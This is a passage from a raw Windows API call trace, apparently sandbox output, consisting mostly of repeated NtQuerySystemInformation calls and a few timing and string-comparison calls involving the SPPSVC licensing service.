ResultLength=0x0) [0226.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0226.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0226.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x28, ResultLength=0x0) [0226.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0226.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0226.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0226.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0226.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x20, ResultLength=0x0) [0226.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0226.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0226.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0226.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0226.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x20, ResultLength=0x0) [0226.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0226.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0226.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.733] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0226.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd338, Length=0x50, ResultLength=0x0) [0226.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x38, ResultLength=0x0) [0226.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0226.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0226.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0226.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0226.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x38, ResultLength=0x0) [0226.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0226.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0226.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x38, ResultLength=0x0) [0226.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0226.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0226.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0226.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0226.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x38, ResultLength=0x0) [0226.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0226.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0226.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0226.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd648, Length=0x50, ResultLength=0x0) [0226.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5c0, Length=0x28, ResultLength=0x0) [0226.741] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0226.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd648, Length=0x50, ResultLength=0x0) [0226.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd648, Length=0x50, ResultLength=0x0) [0226.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0226.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.742] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0226.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0226.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0226.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0226.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x38, ResultLength=0x0) [0226.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0226.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0226.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0226.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd300, Length=0x28, ResultLength=0x0) [0226.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x38, ResultLength=0x0) [0226.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd380, Length=0x28, ResultLength=0x0) [0226.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd380, Length=0x28, ResultLength=0x0) [0226.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x38, ResultLength=0x0) [0226.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x20, ResultLength=0x0) [0226.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x20, ResultLength=0x0) [0226.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x20, ResultLength=0x0) [0226.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x20, ResultLength=0x0) [0226.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x38, ResultLength=0x0) [0226.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x20, ResultLength=0x0) [0226.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x20, ResultLength=0x0) [0226.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x20, ResultLength=0x0) [0226.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.754] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc7520fd590 | out: lpSystemTimeAsFileTime=0xc7520fd590*(dwLowDateTime=0xe86d6bf6, dwHighDateTime=0x1d5fb6e)) [0226.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd648, Length=0x50, ResultLength=0x0) [0226.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd580, Length=0x28, ResultLength=0x0) [0226.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd498, Length=0x50, ResultLength=0x0) [0226.754] GetTickCount () returned 0x1179424 [0226.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd368, Length=0x58, ResultLength=0x0) [0226.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0226.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0226.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0226.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0226.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0226.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x28, ResultLength=0x0) [0226.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0226.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0226.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0226.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0226.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x20, ResultLength=0x0) [0226.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0226.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0226.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0226.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0226.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x20, ResultLength=0x0) [0226.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0226.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0226.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd368, Length=0x58, ResultLength=0x0) [0226.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0226.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0226.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.768] NtQuerySystemInformation 